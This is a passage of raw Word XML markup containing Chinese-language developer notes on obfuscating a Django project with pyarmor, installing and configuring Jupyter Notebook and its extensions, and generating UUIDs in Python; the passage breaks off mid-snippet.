    </w:p>
    <w:p w14:paraId="539A8F20" w14:textId="7F976DA1" w:rsidR="00394E46" w:rsidRDefault="00594C01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00476760">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">pyarmor g -O </w:t>
      </w:r>
      <w:r w:rsidR="006466A3" w:rsidRPr="00476760">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dist</w:t>
      </w:r>
      <w:r w:rsidRPr="00476760">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013A902A" w14:textId="2A07BF59" w:rsidR="00394E46" w:rsidRDefault="00594C01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以将整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目混淆到</w:t>
      </w:r>
      <w:r w:rsidR="006466A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6492E50A" w14:textId="77777777" w:rsidR="00394E46" w:rsidRDefault="00394E46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61C0D492" w14:textId="4EAAE1FC" w:rsidR="00830A73" w:rsidRPr="006B355D" w:rsidRDefault="006B355D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B355D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>此处没有太细究</w:t>
      </w:r>
      <w:r w:rsidRPr="006B355D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006B355D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">-r -i </w:t>
      </w:r>
      <w:r w:rsidRPr="006B355D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>会导致报错、目录层级的问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404D8501" w14:textId="77777777" w:rsidR="00830A73" w:rsidRPr="006B355D" w:rsidRDefault="00830A73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="573D1FD0" w14:textId="5EFA4062" w:rsidR="001D7DC2" w:rsidRPr="001D7DC2" w:rsidRDefault="00B243F9" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="452" w:name="_Toc159779895"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jupyter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="452"/>
    </w:p>
    <w:p w14:paraId="3F4388AC" w14:textId="4184D6EE" w:rsidR="00B243F9" w:rsidRDefault="00B243F9" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="453" w:name="_Toc159779896"/>
      <w:r>
        <w:t>jupyter notebook</w:t>
      </w:r>
      <w:bookmarkEnd w:id="453"/>
    </w:p>
    <w:p w14:paraId="20362E72" w14:textId="73E1E60E" w:rsidR="001D7DC2" w:rsidRDefault="00AF664F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:t>upyter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最主要的功能就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>jupyter notebo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，本质上是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器编辑的笔记本。</w:t>
      </w:r>
      <w:r w:rsidR="00360870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很容易去写代码交互、看到</w:t>
      </w:r>
      <w:r w:rsidR="00360870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>md</w:t>
      </w:r>
      <w:r w:rsidR="00360870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件目录等信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F0D74F" w14:textId="3280A95F" w:rsidR="001D7DC2" w:rsidRDefault="001D7DC2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CEE79C8" w14:textId="77777777" w:rsidR="001D7DC2" w:rsidRPr="001D7DC2" w:rsidRDefault="001D7DC2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32803323" w14:textId="273049D1" w:rsidR="00B243F9" w:rsidRDefault="001A1156" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A1156">
        <w:t>https://zhuanlan.zhihu.com/p/33105153</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D68B343" w14:textId="74B1DCB7" w:rsidR="00B243F9" w:rsidRDefault="00B243F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="666D4E57" w14:textId="687E6C6B" w:rsidR="00B243F9" w:rsidRDefault="00BD0824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>onda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的安装方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66682041" w14:textId="35D5BEF7" w:rsidR="00BD0824" w:rsidRDefault="00BD0824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD0824">
        <w:t>conda install jupyter notebook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC72C3D" w14:textId="4AA8AA18" w:rsidR="00B243F9" w:rsidRDefault="00B243F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43923BFA" w14:textId="4DE2930C" w:rsidR="00A44B64" w:rsidRDefault="00A44B64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果直接启动，是本机的</w:t>
      </w:r>
      <w:r>
        <w:t>8888</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口，如果要让外部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以访问的话，需要执行命令指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044055DB" w14:textId="411B2D61" w:rsidR="00B243F9" w:rsidRDefault="00A44B64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A44B64">
        <w:t>jupyter notebook --ip 0.0.0.0 --port 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB08EEC" w14:textId="6267FD87" w:rsidR="00B243F9" w:rsidRDefault="00B243F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="456E70CB" w14:textId="4754458C" w:rsidR="006F4F06" w:rsidRDefault="006F4F06" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="454" w:name="_Toc159779897"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一获取配置文件路径</w:t>
      </w:r>
      <w:r w:rsidR="004B2213">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或重写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="454"/>
    </w:p>
    <w:p w14:paraId="38E9FBBB" w14:textId="77777777" w:rsidR="006F4F06" w:rsidRDefault="006F4F06" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA7091">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>jupyter notebook --generate-config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC382B3" w14:textId="77777777" w:rsidR="00883EF6" w:rsidRDefault="006F4F06" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这条命令虽然可以用于查看配置文件所在的路径，但主要用途是是否将这个路径下的配置文件替换为默认配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A75FF61" w14:textId="37059F78" w:rsidR="00B243F9" w:rsidRDefault="006F4F06" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你是第一次查询，那么或许不会出现下图的提示；若文件已经存在或被修改，使用这个命令之后会出现询问</w:t>
      </w:r>
      <w:r w:rsidRPr="00883EF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00883EF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Overwrite /Users/raxxie/.jupyter/jupyter_notebook_config.py with default config? [y/N]</w:t>
      </w:r>
      <w:r w:rsidRPr="00883EF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即“用默认配置文件覆盖此路径下的文件吗？”，如果按“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，则完成覆盖，那么之前所做的修改都将失效；如果只是为了查询路径，那么一定要输入“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C070322" w14:textId="14100513" w:rsidR="00B243F9" w:rsidRDefault="00B243F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="459F5596" w14:textId="166D4514" w:rsidR="00B243F9" w:rsidRDefault="00BE7B32" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidR="00DD4BB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA97667" w14:textId="769A3D7D" w:rsidR="00B243F9" w:rsidRDefault="00B243F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1635D135" w14:textId="29A7AE34" w:rsidR="00D63DCD" w:rsidRDefault="00D63DCD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D2D377" w14:textId="547A2683" w:rsidR="00D63DCD" w:rsidRDefault="00D63DCD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="455" w:name="_Toc159779898"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装扩展</w:t>
      </w:r>
      <w:bookmarkEnd w:id="455"/>
    </w:p>
    <w:p w14:paraId="34B9CC88" w14:textId="7E4F53D4" w:rsidR="00FB0DD3" w:rsidRDefault="00FB0DD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="444FF9DB" w14:textId="3AC3DF63" w:rsidR="002D7332" w:rsidRDefault="00CA6EF5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的用户</w:t>
      </w:r>
      <w:r w:rsidR="002D7332">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行如下命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D323527" w14:textId="6B3064B4" w:rsidR="00CA6EF5" w:rsidRDefault="00CA6EF5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（注意，会对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>anaconda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录进行改动，运行该命令用户需要具备对应的文件夹访问和写入权限，可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>chown xxx:xxx /anaconda3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如我的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>anaconda3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D20CCD" w14:textId="73505095" w:rsidR="00CA6EF5" w:rsidRPr="00CA6EF5" w:rsidRDefault="00CA6EF5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2685614F" w14:textId="7D9EFAB4" w:rsidR="00FB0DD3" w:rsidRDefault="00FB0DD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB0DD3">
        <w:t>conda install nb_conda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FBAE9E" w14:textId="3D7A7671" w:rsidR="00B243F9" w:rsidRDefault="00A26BE3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A26BE3">
        <w:t>conda install</w:t>
      </w:r>
      <w:r w:rsidR="00BC6D53" w:rsidRPr="00BC6D53">
        <w:t xml:space="preserve"> -c conda-forge</w:t>
      </w:r>
      <w:r w:rsidRPr="00A26BE3">
        <w:t xml:space="preserve"> jupyter_contrib_nbextensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0204198E" w14:textId="34700988" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="492A81E5" w14:textId="7EC5FFB6" w:rsidR="00D63DCD" w:rsidRPr="00330553" w:rsidRDefault="00D63DCD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CEFDAF0" w14:textId="20C51D2A" w:rsidR="00D63DCD" w:rsidRDefault="00D63DCD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B12927" w14:textId="112B0D05" w:rsidR="00723181" w:rsidRDefault="00723181" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="456" w:name="_Toc159779899"/>
      <w:r>
        <w:t>uuid</w:t>
      </w:r>
      <w:bookmarkEnd w:id="456"/>
    </w:p>
    <w:p w14:paraId="44FC9200" w14:textId="6CF1AE0C" w:rsidR="00D63DCD" w:rsidRDefault="00D63DCD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0436ACBE" w14:textId="488DCE9F" w:rsidR="008A413F" w:rsidRDefault="008A413F" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mport uuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C11E66" w14:textId="5BCFDB28" w:rsidR="00652D37" w:rsidRDefault="00652D37" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00652D37">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>import random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6546DB46" w14:textId="77D7A0EE" w:rsidR="008A413F" w:rsidRDefault="0098473D" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print(</w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(uuid.</w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>uuid5</w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(uuid.NAMESPACE_DNS, </w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(uuid.</w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>uuid1</w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">()) + </w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(random.</w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()))).</w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'-'</w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
